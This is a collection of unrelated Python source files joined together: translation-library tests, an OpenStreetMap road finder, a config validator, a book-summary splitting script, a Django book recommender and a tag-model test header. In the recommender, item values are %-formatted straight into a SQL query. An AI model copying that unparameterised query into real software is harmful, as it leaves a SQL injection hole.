if __name__ == "__main__":
main() |
import unittest
import os
from m2translate import *
__author__ = '<NAME> (<EMAIL>)'
# clear all translate files for json store connector
json_path = os.path.join('json_store')
def count_json_locales(path):
locales_cnt = 0
for f in os.listdir(path):
file_path = os.path.join(path, f)
if os.path.isfile(file_path):
basename = os.path.split(file_path)[1]
l, ext = os.path.splitext(basename)
if ext == '.json':
locales_cnt += 1
return locales_cnt
# init translate module and json store connector
connector = JSONConnector()
tr = M2Translate(connector, not_found_val='N/A')
tr.clear_store()
class M2TranslateTests(unittest.TestCase):
def test_001_create_locale(self):
tr.add_locale('ru_RU', dump_permanently=False)
self.assertEqual(len(tr.locales), 1)
print('#001 Locale `ru_RU` created in memory')
def test_002_add_phs_to_ru(self):
tr.set_p('FORM1.NAME', none='Имя')
tr.set_p('FORM1.SURNAME', none='Фамилия', l='ru_RU')
tr.set_p('FORM1.VISITS', none='визитов', single='визит', multi='визитов')
self.assertEqual(len(tr.locales['ru_RU']), 3)
print('#002 Added placeholders for `ru_RU`')
def test_003_dump_ru_locale(self):
tr.dump_locales()
print('#003 Dumped locales (`ru_RU`)')
def test_004_create_new_locale(self):
tr.add_locale('en_US', dump_permanently=False)
self.assertEqual(len(tr.locales), 2)
print('#004 Locale `en_US` created in memory')
def test_005_set_active_locale(self):
tr.set_cur_locale('en_US')
self.assertEqual(tr.cur_locale, 'en_US')
print('#005 Locale `en_US` has been set as active')
def test_006_add_phs_to_en(self):
tr.set_p('FORM1.NAME', none='Name')
tr.set_p('FORM1.SURNAME', none='Surname', l='en_US')
tr.set_p('FORM1.VISITS', none='visits', single='visit', multi='visits')
tr.set_p('FORM1.SUBMIT', none='OK')
self.assertEqual(len(tr.locales['ru_RU']), 3)
self.assertEqual(len(tr.locales['en_US']), 4)
print('#006 Added placeholders for `en_US`')
def test_007_dump_en_locale(self):
tr.dump_locales()
self.assertEqual(len(tr.locales['ru_RU']), 4)
self.assertEqual(len(tr.locales['en_US']), 4)
print('#007 Dumped locales (`en_US`)')
def test_008_reload_locales(self):
tr.set_p('WILL_BE_ERASED', none='', single='', multi='')
self.assertEqual(len(tr.locales['en_US']), 5)
tr.reload_locales()
self.assertEqual(len(tr.locales['en_US']), 4)
print('#008 Locales are reloaded')
def test_009_remove_locale(self):
tr.add_locale('tmp_locale')
tr.dump_locales()
self.assertEqual(count_json_locales(json_path), 3)
tr.remove_locale('tmp_locale', dump_permanently=True)
self.assertEqual(count_json_locales(json_path), 2)
print('#009 Locale was successfully created and then removed')
def test_010_get_translations(self):
tr.set_cur_locale('ru_RU')
self.assertEqual(tr.p('FORM1.VISITS', 0), 'визитов')
self.assertEqual(tr.p('FORM1.VISITS', 1), 'визит')
self.assertEqual(tr.p('FORM1.VISITS', 10), 'визитов')
tr.set_cur_locale('en_US')
self.assertEqual(tr.p('FORM1.VISITS', 0), 'visits')
self.assertEqual(tr.p('FORM1.VISITS', 1), 'visit')
self.assertEqual(tr.p('FORM1.VISITS', 10), 'visits')
print('#010 Placeholder values were successfully returned')
|
<reponame>sahyagiri/osm_roads
import h5py
import json
import ast
from geojson import LineString, Point, Feature
from turfpy.measurement import point_to_line_distance
import geohash
import osmium as osm
class OsmRoads(osm.SimpleHandler):
def __init__(self,hdf5_file_name:str,openstreetmap_pbf_file_name=None):
osm.SimpleHandler.__init__(self)
if openstreetmap_pbf_file_name!=None:
self.hdf5_connection = self.__load_openstreetmap_road_data(openstreetmap_pbf_file_name,hdf5_file_name)
else:
self.hdf5_connection = self.__load_hdf5_file(hdf5_file_name)
def __insert_geohash_road_segment(self, road_segment:dict):
geohash_prefix=road_segment['geohash'][:6]
geohash_suffix=road_segment['geohash'][6:]
try:
self.hdf5_connection.create_group(geohash_prefix)
except:
pass
try:
group2=self.hdf5_connection.create_group(geohash_prefix+'/'+geohash_suffix)
except:
group2= self.hdf5_connection.get('/'+geohash_prefix+'/'+geohash_suffix)
item_count=str(len(group2.items())+1)
group2.create_dataset(item_count,data=json.dumps(road_segment).encode("utf-8"))
def way(self, way):
if way.tags.get("highway") in {'bridleway','construction','cycleway','footway','living_street','motorway','motorway_link','path','pedestrian','platform','primary','primary_link','proposed','raceway','residential','rest_area','road','secondary','secondary_link','service','steps','tertiary','tertiary_link','track','trunk','trunk_link','unclassified'}:
#node.ref
nodes=[]
for member_node in way.nodes:
if member_node.location.valid():
nodes.append([member_node.lon,member_node.lat])
geohash_mid_point_index=int(len(nodes)/2)
geohash_key=geohash.encode(nodes[geohash_mid_point_index][1],nodes[geohash_mid_point_index][0])
way_points="["
for point in nodes:
way_points+='['+str(point[0])+","+str(point[1])+'],'
way_points=way_points[:-1]+"]"
road_segment=dict(way.tags)
road_segment['geohash']=geohash_key
road_segment['coordinates']=way_points
self.__insert_geohash_road_segment(road_segment)
def __load_openstreetmap_road_data(self,openstreetmap_pbf_file_name, hdf5_file_name):
self.hdf5_connection=h5py.File(hdf5_file_name, "w")
self.apply_file(openstreetmap_pbf_file_name,locations=True)
self.hdf5_connection.close()
##return read only handler
return self.__load_hdf5_file(hdf5_file_name)
def __load_hdf5_file(self,hdf5_file_name):
try:
return h5py.File(hdf5_file_name, "r")
except:
raise ValueError("The program could not load the file.Possible invalid/corrupt file.")
def get_closest_road(self,latitude:float, longitude:float):
DISTANCE_MAX=1000
geohash_prefix=geohash.encode(latitude,longitude)[:6]
point=Feature(geometry=Point([longitude, latitude]))
distance=DISTANCE_MAX
road_information={}
for road_segments in self.hdf5_connection[geohash_prefix]:
for road_subsegments in self.hdf5_connection[geohash_prefix][road_segments].keys():
metadata_dictionary=ast.literal_eval(self.hdf5_connection[geohash_prefix][road_segments][road_subsegments][()].decode("utf-8"))
line_string=Feature(geometry=LineString(ast.literal_eval(metadata_dictionary['coordinates'])))
current_distance=point_to_line_distance(point, line_string)
if current_distance<distance:
distance=current_distance
road_information=metadata_dictionary
road_information['distance']=distance
return road_information
def close_database(self):
try:
self.hdf5_connection.close()
except:
pass
def __del__(self):
self.hdf5_connection.close() |
import os
import toml
from typing import List
from datetime import datetime
from utils import persistence
class GlobalConfig:
"""
Main Config.
"""
def __init__(self, path: str) -> None:
"""
Config object constructor.
:param path: Path to scenario configuration TOML file
"""
parsed_toml = toml.load(path, _dict=dict)
# Scenario settings
self.SOURCE = path
# Setup
self.SOURCES = self.valid_samplers(parsed_toml["setup"]["sources"])
self.SAMPLE = self.valid_sample_float(parsed_toml["setup"]["sample"])
self.EPSG = self.valid_int(parsed_toml["setup"]["epsg"], "epsg")
self.SEED = self.valid_int(parsed_toml["setup"]["seed"], "seed")
self.VERBOSE = self.valid_bool(parsed_toml["setup"]["verbose"], "verbose")
# Paths
self.data_location = self.valid_path(parsed_toml["paths"]["data_dir"], "data_dir")
self.OUTPATH = self.valid_path(parsed_toml["paths"]["out_dir"], "out_dir", create=True)
self.plans_name = parsed_toml["paths"]["plans_name"]
self.XMLPATH = os.path.join(self.OUTPATH, self.plans_name)
self.attributes_name = parsed_toml["paths"]["attributes_name"]
self.XMLPATHATTRIBS = os.path.join(self.OUTPATH, self.attributes_name)
# Records to include in output and log:
self.RECORDS = {
'config': self.SOURCE,
'outpath': self.OUTPATH,
'timestamp': str(datetime.now()),
'data_dir': self.data_location,
'sources': self.SOURCES,
'sample': self.SAMPLE,
'crs': self.EPSG,
'seed': self.SEED,
'plans_name': self.XMLPATH,
'attributes_name': self.XMLPATHATTRIBS,
}
def print_records(self):
for k, v in self.RECORDS.items():
print('\t> {}: {}'.format(k, v))
@staticmethod
def valid_path(path: str, field_name: str = 'missing', create: bool = False) -> str:
"""
Raise exception if specified path does not exist, otherwise return path.
:param path: Path to check
:param field_name: Field name to use in exception if path does not exist
:param create: create given path if missing, boolean, default=False
:return: Pass through path if it exists
"""
if not persistence.dir_exists(path):
if not persistence.is_s3_location(path) and create:
print(f"Creating directory; {path}")
os.mkdir(path)
else:
raise Exception(f"Specified path for {field_name}: {path} does not exist")
return path
@staticmethod
def valid_file(path: str, field_name: str = 'missing') -> str:
"""
Raise exception if specified path does not exist, otherwise return path.
:param path: Path to check
:param field_name: Field name to use in exception if path does not exist
:return: Pass through path if it exists
"""
if not persistence.file_exists(path):
raise Exception(f"Specified path for {field_name}: {path} does not exist")
return path
@staticmethod
def valid_samplers(inp: List[str]) -> List[str]:
"""
:param inp: list if strings expected
:return: list[str]
"""
if not inp and not all(isinstance(s, str) for s in inp):
raise Exception(
f'Specified samplers: ({inp}) expected to be list of strings'
)
return inp
@staticmethod
def valid_sample_float(inp: float) -> float:
"""
Raise exception if specified float is outside an acceptable range, i.e.
beyond [0.01, 100], otherwise return scale factor.
:param inp: Scale factor
:return: Pass through scale factor if valid
"""
if inp < 0.01 or inp > 100:
raise Exception(
"Specified sample percentage ({}) not in valid range".format(inp)
)
return float(inp)
@staticmethod
def valid_int(inp: int, field_name: str) -> int:
"""
:param inp: integer expected
:param field_name: Field name to use in exception
:return: int
"""
if not isinstance(inp, int):
raise Exception(
f'Specified {field_name}: ({inp}) expected to be integer'
)
return inp
@staticmethod
def valid_bool(inp: bool, field_name: str) -> bool:
"""
:param inp: bool expected
:param field_name: Field name to use in exception
:return: bool
"""
if not isinstance(inp, bool):
raise Exception(
f'Specified {field_name}: ({inp}) expected to be boolean'
)
return inp
|
"""
/*
* Copyright (c) 2021, salesforce.com, inc.
* All rights reserved.
* SPDX-License-Identifier: BSD-3-Clause
* For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
*/
This script is used to identify and separate summaries of the following kind from scraped summary files:
Chapter 1 Summary:
Chapter 2 Summary:
Chapter 3 Summary:
.
.
Not all combined summaries are separable, but using this script, we try to find the ones that are not a 'true'
combined summary, but rather just a collection of different chapter summaries in the same document.
"""
import json
import os
import re
from os.path import basename, dirname
from word2number import w2n
from unidecode import unidecode
from tqdm import tqdm
from string import punctuation
#An intermediate matched file is required
matched_books = "../../alignments/summary_chapter_matched_intermediate.jsonl"
matched_books = "../../alignments/summary_chapter_matched_intermediate.jsonl"
chapterized_books_dir = "../../" # replace with whereever the chapterized books are extracted
f_matched = open(matched_books,"r")
all_matched_titles = []
for line in f_matched:
x = json.loads(line)
all_matched_titles.append(x['book_id'].split('.')[0])
# Error file to keep track of different error cases
f_all_errors = open("splitting_aggregates_errors.txt", "w")
# Log file to debug the section splits
f_matched_section_splits = open("matched_section_splits.txt", "w")
def romanToInt(s):
roman = {'i':1,'v':5,'x':10,'l':50,'c':100,'d':500,'m':1000,'iv':4,'ix':9,'xl':40,'xc':90,'cd':400,'cm':900}
i = 0
num = 0
while i < len(s):
if i+1<len(s) and s[i:i+2] in roman:
num += roman[s[i:i+2]]
i += 2
else:
num += roman[s[i]]
i += 1
return num
# Saves the summaries we have broken down into new section jsons,
# Along with the new section name
def save_separated_summaries(separated_summaries, summary_json, summary_path, section_summary_title):
old_section_name = os.path.basename(summary_path)
old_section_name = old_section_name.split('_part_0.txt')[0]
summary_dir = os.path.dirname(summary_path)
# print ("summary_path: ", summary_path)
count = 0
for key, summary in separated_summaries.items():
count += 1
section_json = {}
section_json['name'] = key
section_json['summary'] = summary
if 'analysis' in summary_json:
section_json['analysis'] = summary_json['analysis']
else:
section_json['analysis'] = ""
if 'url' in summary_json:
section_json['url'] = summary_json['url']
else:
section_json['url'] = ""
fout_name = os.path.join(summary_dir,old_section_name + "_part_{}.txt".format(str(count)))
print ("fout_name: ", fout_name)
fout = open(fout_name,"w")
json.dump(section_json, fout)
return count - 1
def replace_pat2(matched_str):
# print (matched_str.groups())
# try:
if matched_str.group(1) != "":
num = matched_str.group(1).strip()
else:
num = matched_str.group(2).strip()
# print ("num: ", num)
try:
ret = matched_str.group(0).replace(num, str(w2n.word_to_num(num)))
except ValueError:
num = matched_str.group(2).strip()
ret = matched_str.group(0).replace(num, str(w2n.word_to_num(num)))
# print ("ret: ", ret, "\n")
return ret
# Separates the multiple chapter summaries we have found
def separate_mulitple_summaries(summary_content, matched_numeric_roman, matched_numbers_nl, section_name_prefix, summary_path):
# print ("summary_content: ", summary_content)
# All patterns should match starting of line
pat_num_rom = '^(?:PARAGRAPH>)?((chapter|scene) ([ivxl|0-9]{1,}))[^a-z0-9]?'
pat_act_scene = '^(?:PARAGRAPH>)?((act) ([ivxl|0-9]{1,})[,-]{0,}[ ]{1,}(scene) ([ivxl|0-9]{1,}))[^a-z0-9]?'
pat_nl = '^(?:PARAGRAPH>)?((chapter|scene) (twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([-|–]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)(.*$)'
# Also need to convert in this case
#Break the entire summary content into lines and check for <PARAGRAPH> tag too in the regex
# We break on period, exclamation mark and question mark, all 3
lines = list(filter(None, re.split("[.|!|?|\"]", summary_content)))
# dict with both the summary and the section name
summaries = {}
summary = []
section_name = ""
for line in lines:
line = line.strip()
line = remove_prefixes_line(line)
# Because we can have a mix of roman, numeric and natural language numbers... :(
if re.match(pat_num_rom, line, re.IGNORECASE) or re.match(pat_nl, line, re.IGNORECASE) or re.match(pat_act_scene, line, re.IGNORECASE):
# if 'chapter' in line or 'act' in line: #What about act keyword?
# Why do we even need this check?
if summary == []:
summary.append(line)
else:
if section_name_prefix != "" and 'act' not in section_name.strip().lower():
# print ("added section_name_prefix: ", section_name_prefix)
section_name = section_name_prefix + ", " + section_name
if section_name not in summaries:
# print ("section_name adding: ", section_name)
summaries[section_name] = ". ".join(summary)
if section_name.strip() == "":
f_all_errors.write("Section name empty" + "\t" + summary_path)
f_all_errors.write("\n")
summary = []
summary.append(line)
if re.match(pat_nl, line, re.IGNORECASE):
section_name = re.match(pat_nl, line, re.IGNORECASE).group(1)
splits = section_name.split()
section_name = " ".join([splits[0], str(w2n.word_to_num(splits[1]))])
section_name = section_name.strip()
elif re.match(pat_num_rom, line, re.IGNORECASE):
prev_section_name = section_name
section_name = re.match(pat_num_rom, line, re.IGNORECASE).group(1)
# section_name = section_name.strip()
#Not considered a legit match. Will have to check manually
# if section_name == 'chapter i':
# section_name = prev_section_name
# print ("section_name: ", section_name)
elif re.match(pat_act_scene, line, re.IGNORECASE):
section_name = re.match(pat_act_scene, line, re.IGNORECASE).group(1)
section_name = section_name.strip()
else:
summary.append(line)
if summary != []:
if section_name_prefix != "" and section_name != "" and 'act' not in section_name.strip().lower():
section_name = section_name_prefix + ", " + section_name
if section_name not in summaries:
summaries[section_name] = ".".join(summary)
return summaries
# Checks for the presence of muliple unqiue chapters present in the book
# If multiple keywords like 'Chapter' 'Scene' etc followed by a number are found,
# it points towards multiple individual summaries since we already know it is an aggregate
def check_multiple_summaries(summary):
summary = summary.strip().replace("\n"," ")
#Matches Chapter 1, followed by some string
pat1 = "^[<PARAGRAPH>]{0,}(?:chapter|scene) (?:[ivxl|0-9]{1,})[^a-z](.*$)"
#Matches chapter twenty-two followed by some string
pat7 = '^[<PARAGRAPH>]{0,}(?:chapter|scene) ((twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([,-]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)(.*$)'
#Matches Act 1, Scene 3 and Act 1 Scene 3
pat_act_scene = '^[<PARAGRAPH>]{0,}((act) ([ivxl|0-9]{1,})[,-]{0,}[ ]{1,}(scene) ([ivxl|0-9]{1,}))[^a-z](.*$)'
# Flag for matching with roman or numeric numbers
matched_numeric_roman = 0
# stands for matched numbers natural language
matched_numbers_nl = 0
if re.match(pat1, summary, re.IGNORECASE):
matched_numeric_roman = 1
if re.match(pat_act_scene, summary, re.IGNORECASE):
matched_numeric_roman = 1
if re.match(pat7, summary, re.IGNORECASE):
matched_numbers_nl = 1
return matched_numeric_roman, matched_numbers_nl
def check_book_num_prefix(summary_id):
pat = '^((book|part) [ivxl|0-9]{1,})[, ]{0,}(.*$)'
section_name_prefix = ""
if re.match(pat, summary_id, re.IGNORECASE):
section_name_prefix = re.match(pat, summary_id, re.IGNORECASE).group(1)
return section_name_prefix
# Remove prefixes from every summary to further check for the combined/multiple summaries
def remove_prefixes_line(line):
line = line.strip().replace("\n"," ")
pat_translation = '^(Read a translation of.*?(scene|chapter) [ivxl|0-9]{1,}[ ]{0,}-[ ]{0,})(.*$)'
# Remove the "Read a translation of.." line
if re.match(pat_translation, line, re.IGNORECASE):
to_replace = re.match(pat_translation, line, re.IGNORECASE).group(1)
line = line.replace(to_replace,"")
line = line.strip()
# of Vol. II,
pat = '^((of Vol.)[ ]{0,}[ivxl][ ]{0,}[:|,|-]{0,})'
if re.search(pat, line, re.IGNORECASE):
to_replace = re.match(pat, line, re.IGNORECASE).group(0)
line = line.replace(to_replace,"")
line = line.strip()
pat = '^((summary|summary and analysis|summary & analysis)[ ]{0,}[:|,|-]{0,})'
if re.search(pat, line, re.IGNORECASE):
to_replace = re.match(pat, line, re.IGNORECASE).group(0)
line = line.replace(to_replace,"")
line = line.strip()
#Remove any leading punctuations
line = line.lstrip(punctuation)
return line.strip()
# Remove prefixes from every summary to further check for the combined/multiple summaries
def remove_prefixes_summary(summary):
summary = summary.strip().replace("\n"," ")
pat_chap = '(.*?)Chapter [ivxl|0-9]{1,}[^a-z]'
pat_scene = '(.*?)Scene [ivxl|0-9]{1,}[^a-z]' #Do this only if there is no 'Act' preceding the scene TODO
#Why were we removing the 'Chapter' keyword instead of 'Chapters'?
pat7 = '(.*?)(chapter|scene ((twenty|thirty|forty|fifty|sixty|seventy|eighty|ninety|eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)([,-]?)(eleven|twelve|thirteen|fourteen|fifteen|sixteen|seventeen|eighteen|nineteen|one|two|three|four|five|six|seven|eight|nine|ten)?)).*$'
if re.search(pat_chap, summary, re.IGNORECASE):
to_replace = re.search(pat_chap, summary, re.IGNORECASE).group(1)
if len(to_replace.split()) < 150: # If we are removing too many words, better to not remove!
summary = summary.replace(to_replace,"")
summary = summary.strip() #We can remove multiple prefixes
if re.search(pat_scene, summary, re.IGNORECASE):
to_replace = re.search(pat_scene, summary, re.IGNORECASE).group(1)
if len(to_replace.split()) < 150:
summary = summary.replace(to_replace,"")
summary = summary.strip()
if re.search(pat7, summary, re.IGNORECASE):
to_replace = re.search(pat7, summary, re.IGNORECASE).group(1)
if len(to_replace.split()) < 150:
summary = summary.replace(to_replace,"")
return summary.strip()
#combined summary doesn't have summaries of separate chapters combined together
def check_combined_summary(summary):
#TODO: Should we add a check for a scene or act range too?
pat = '^((summary|summary and analysis|summary & analysis)[ ]{0,}[:|,|-]{0,})'
if re.search(pat, summary, re.IGNORECASE):
to_replace = re.match(pat, summary, re.IGNORECASE).group(0)
summary = summary.replace(to_replace,"")
summary = summary.strip()
pat2 = '^[ ]{0,}[<PARAGRAPH>]{0,}[ ]{0,}((chapters|chapter) ([ivxl|0-9+]{1,}[,|-|–]){1,}[ivxl|0-9+]{1,})(.*$)'
combined_summary_flag = 0
if re.search(pat2, summary, re.IGNORECASE):
print (re.match(pat2, summary, re.IGNORECASE).groups())
prefix = re.match(pat2, summary, re.IGNORECASE).group(1)
summary = summary.replace(prefix,"")
combined_summary_flag = 1
# If there is no differentiating keyword it might still be a combined summary!
return combined_summary_flag, summary.strip()
def get_summary_files_chapter_count(x):
chapter_dir = dirname(x['chapter_path'])
toc_path = os.path.join(chapterized_books_dir ,chapter_dir, "toc.txt")
f_toc = open(toc_path, "r")
f_toc_lines = f_toc.readlines()
num_toc_lines = len(f_toc_lines)
if "\n" in f_toc_lines:
num_toc_lines = num_toc_lines - 1
summary_dir = dirname(summary_path)
summary_file_list = os.listdir(summary_dir)
summary_dir_count = len(summary_file_list)
if 'overview.txt' in summary_file_list or 'overview.json' in summary_file_list:
summary_dir_count = summary_dir_count - 1
return num_toc_lines, summary_dir_count
multiple_summaries = 0
not_flagged = 0
total_aggregates = 0
total_new_summaries = 0
counter = 0
books_set = []
fp = open(matched_books, "r")
fp_lines = fp.readlines()
for line in tqdm(fp_lines):
line = line.rstrip().strip()
x = json.loads(line)
counter += 1
books_set.append(x['bid'])
summaries_counted = 0
prev_book_unique_id = ""
book_unique_id = x['book_id'].split('.')[0] + "." + x['source']
if x['is_aggregate']:
total_aggregates += 1
if (book_unique_id != prev_book_unique_id) and prev_book_unique_id != "":
summaries_counted = 0
summary_path = os.path.join("../", x['summary_path'])
if not os.path.exists(summary_path):
# Summary directory missing
continue
num_toc_lines, summary_dir_count = get_summary_files_chapter_count(x)
# No splitting needed if we have much lesser files that those exist in the TOC
# This is mainly for plays where we may have just Act 1, so trying to split Act 1 actually reduces a data point
if summary_dir_count + 1 > num_toc_lines: # number of toc lines are usually more only or the same. +1 to handle prologue, intro, epilogue etc
f_all_errors.write("Too many files already:" + "\t" + summary_path)
f_all_errors.write("\n")
continue
print ("summary_dir_count: ", summary_dir_count)
print ("num_toc_lines: ", num_toc_lines)
# Error can occur if we have multiple occurences of the same book and source..
try:
fx = open(summary_path, "r")
except Exception as e:
print (e)
f_all_errors.write("Error loading summary path" + "\t" +summary_path)
f_all_errors.write("\n")
continue
summary_json = json.load(fx)
summary_content = summary_json['summary']
og_summary_content = summary_content
summary_content = remove_prefixes_summary(summary_content)
combined_summary_flag, summary_content = check_combined_summary(summary_content)
# Combined check may return true and the text can still have multiple summaries. Eg. Chapters 4-5 Chapter 4 ....
# Treat the above as a prefix removing step for now
# print ("x: ", x)
matched_numeric_roman, matched_numbers_nl = check_multiple_summaries(summary_content)
# If it is not a combined summary of multiple chapters,
# But has multiple summaries with either roman, numeric or natural language numbers
# if not combined_summary_flag and (matched_numeric_roman or matched_numbers_nl):
if (matched_numeric_roman or matched_numbers_nl):
# section_name_prefix = check_book_num_prefix(x['summary_id'])
section_name_prefix = ""
book_id_splits = x['book_id'].split('.')
if len(book_id_splits) == 3:
section_name_prefix = book_id_splits[1]
#TODO: Look into fixing splits obtained from part 1-2.chapters 11-1 type of book ids. Use regex!
# Ans: In this case we are currently just capturing the chapter number. Usually we are to match just on the basis
# of that along with the order of the section files
if '-' in section_name_prefix or section_name_prefix == 'epilogue':
section_name_prefix = ""
section_summary_title = x['summary_id']
#If there are multiple occurences of the section_name_prefix, then don't use any prefix
if section_name_prefix != "":
if len(re.findall("act ", section_summary_title)) > 1:
section_name_prefix = ""
# print ("section_name_prefix: ", section_name_prefix)
separated_summaries = separate_mulitple_summaries(summary_content, matched_numeric_roman, matched_numbers_nl, section_name_prefix, summary_path)
print ("separated_summaries keys: ", separated_summaries.keys())
# No need to separate and use the new section name if we only have one single summary found after breaking
# Also protects against some false positives wrt splitting the sections
if len(separated_summaries.keys()) == 1:
#keep it saved normally
continue
else:
multiple_summaries += 1
# If there is an empty section name, it means we removed some part of the summary as a prefix, which doesn't have an associated
# section name. In such a case, refrain from the splitting the summary into chapters
if '' not in separated_summaries.keys() and ' ' not in separated_summaries.keys():
summaries_counted += save_separated_summaries(separated_summaries, summary_json, summary_path, section_summary_title)
# Remove the old summary path
os.remove(summary_path)
f_matched_section_splits.write(section_summary_title + " : ")
for key, val in separated_summaries.items():
f_matched_section_splits.write(key + " | ")
total_new_summaries += 1
f_matched_section_splits.write(summary_path)
f_matched_section_splits.write("\n")
else:
# No need to separate, save as is
not_flagged += 1
print ("multiple_summaries to split: ", multiple_summaries)
print ("total_new_summaries: ", total_new_summaries)
print ("total books: ", len(set(books_set)))
print ("no need to separate: ", not_flagged)
print ("total aggregates: ", total_aggregates)
|
# coding:utf-8
# 推荐算法脚本,包括基于用户的协同过滤
import math
import operator
import time
from django.core.cache import cache
import MySQLdb
begin = time.time()
from django.db import connection
def get_default_train_dict():
"""
得到用于训练的user-item模型
:return:
"""
train_dict = dict()
cursor = connection.cursor()
sql = "select distinct * from user_record.user_item"
cursor.execute(sql)
rs = cursor.fetchall()
for row in rs:
user = row[0]
items_in_string = row[1]
items_list = items_in_string.split("&")
items_list.remove("")
if not train_dict.has_key(user):
train_dict[user] = items_list
else:
continue
return train_dict
def single_user_similarity(train_dict,sys_user,sys_user_items):
# 建立物品-用户倒排表
C =dict()
for i in sys_user_items:
sql1 = "select users from user_record.item_users where item='%s'" % i
new_cursor = connection.cursor()
new_cursor.execute(sql1)
new_rs = new_cursor.fetchall()
users = list()
for i in new_rs:
users.append(i[0])
for v in users:
if v == sys_user:
continue
if not C.has_key(v):
C[v] = 0.0
C[v] += 1/math.log(1+len(users))
# 计算最后的相似度矩阵W
print "calc the W"
W = dict()
for v, cuv in C.items():
if not W.has_key(v):
W[v] = 0.0
W[v] = cuv / math.sqrt(len(sys_user_items) * len(train_dict[v]))
return W
def single_user_recommend(user,single_related_users,K,add_sysuser_train_dict):
# 先选出与user 相似度最高的K个用户
# 先提取出没有发生过行为的物品
# 然后计算 WaB+WaC 为对物品的兴趣度
# 取两个用户
rank = dict()
new_list = sorted(single_related_users.items(),key=operator.itemgetter(1),reverse=True)
K_list = new_list[0:K]
for v,wuv in K_list:
for i in add_sysuser_train_dict[v]:
if i in add_sysuser_train_dict[user]:
continue
if not rank.has_key(i):
rank[i] = 0.0
rank[i] += wuv
return rank
# rank = SingleRecommend('TANG',related_users,30,train_dict)
# new_list = sorted(rank.items(),key=operator.itemgetter(1),reverse=True)
# print "get the recommend--------"
#
# for i in new_list[25:50]:
# print i
# print "------"+str(time.time()-begin)+"-------"
def book_recommend(username,douban_id_list):
# 得到缓存
train_dict_cache = cache.get("train_dict_cache")
if train_dict_cache:
print "print get train_dict_cache"
default_train_dict = train_dict_cache
related_user = single_user_similarity(default_train_dict,username,douban_id_list)
default_train_dict[username] = douban_id_list
rank = single_user_recommend(username,related_user,30,default_train_dict)
new_list = sorted(rank.items(),key=operator.itemgetter(1),reverse=True)
for book in new_list:
if book[0] in ['1770782', '1084336', '1008145', '1082154', '25862578',
'3259440', '1046265', '3211779', '2567698', '1017143',
'1007305', '1016300', '1040771', '20427187', '6082808',
'5275059', '1461903', '1200840', '1141406', '1041007',
'10554308', '3066477', '1068920', '4238362', '5363767',
'4242172', '1083428', '1090043', '1026425', '2256039',
'1873231', '1071241', '3995526', '1400705', '1039487',
'1041482', '1059406', '1023045', '2209098', '4742918',
'1022060', '4886245', '3879301', '1529893', '1009257',
'1057244', '1858513', '1066462', '4913064', '1082334',
'25747921', '2062200', '1255625', '3646172', '1049219',
'1975797', '4074636', '1432596', '2250587', '1045818',
'1029791', '1049189', '1948901', '1361264', '10594787',
'1013129', '2022979', '3426869', '1059419', '1050339',
'1085860', '1007914', '1019568', '26340138', '1089243',
'1065970', '3598313', '4714734', '1827374', '2159042',
'1029159', '6388661', '1030052', '3369600', '1949338',
'5317075',]:
new_list.remove(book)
return new_list[:20]
else:
default_train_dict = get_default_train_dict()
cache.set("train_dict_cache",default_train_dict,2592000)
print "success get the train_dict"
related_user = single_user_similarity(default_train_dict,username,douban_id_list)
default_train_dict[username] = douban_id_list
rank = single_user_recommend(username,related_user,30,default_train_dict)
new_list = sorted(rank.items(),key=operator.itemgetter(1),reverse=True)
for book in new_list:
if book[0] in ['1770782', '1084336', '1008145', '1082154', '25862578',
'3259440', '1046265', '3211779', '2567698', '1017143',
'1007305', '1016300', '1040771', '20427187', '6082808',
'5275059', '1461903', '1200840', '1141406', '1041007',
'10554308', '3066477', '1068920', '4238362', '5363767',
'4242172', '1083428', '1090043', '1026425', '2256039',
'1873231', '1071241', '3995526', '1400705', '1039487',
'1041482', '1059406', '1023045', '2209098', '4742918',
'1022060', '4886245', '3879301', '1529893', '1009257',
'1057244', '1858513', '1066462', '4913064', '1082334',
'25747921', '2062200', '1255625', '3646172', '1049219',
'1975797', '4074636', '1432596', '2250587', '1045818',
'1029791', '1049189', '1948901', '1361264', '10594787',
'1013129', '2022979', '3426869', '1059419', '1050339',
'1085860', '1007914', '1019568', '26340138', '1089243',
'1065970', '3598313', '4714734', '1827374', '2159042',
'1029159', '6388661', '1030052', '3369600', '1949338',
'5317075',]:
new_list.remove(book)
return new_list[:20]
def user_recommend(username,douban_id_list):
train_dict_cache = cache.get("train_dict_cache")
if train_dict_cache:
default_train_dict = train_dict_cache
user_list=single_user_similarity(default_train_dict,username,douban_id_list)
new_list = sorted(user_list.items(), key=operator.itemgetter(1), reverse=True)
K_list = new_list[0:9]
print "here"
print K_list
return K_list
else:
default_train_dict = get_default_train_dict()
user_list = single_user_similarity(default_train_dict, username, douban_id_list)
new_list = sorted(user_list.items(), key=operator.itemgetter(1), reverse=True)
K_list = new_list[0:9]
print K_list
print "here"
return K_list |
# -*- coding: utf-8 -*-
"""
Tagulous test: Tag models
Modules tested:
tagulous.models.models.BaseTagModel
tagulous.models.models.TagModel
tagulous.models.models.TagModelManager
tagulous.models.models.TagModelQuerySet
"""
import unittest
from django.db import IntegrityError
from django.test import TestCase
import tagulous.settings as tagulous_settings
from tagulous import models as tag_models
from tagulous import utils as tag_utils
from tagulous.settings import SLUG_TRUNCATE_UNIQUE
from tests.lib import TagTestManager
from tests.tagulous_tests_app import models as test_models
class TagModelTest(TagTestManager, TestCase):
"""
Test tag model basics
"""
manage_models = [
test_models.MixedTest,
test_models.MixedRefTest,
test_models.NonTagRefTest,
]
def setUpExtra(self):
self.tag_model = test_models.MixedTestTagModel
self.model1 = test_models.MixedTest
self.model2 = test_models.MixedRefTest
self.model_nontag = test_models.NonTagRefTest
def test_tags_equal_instance(self):
"Test TagModel.__eq__ with instances"
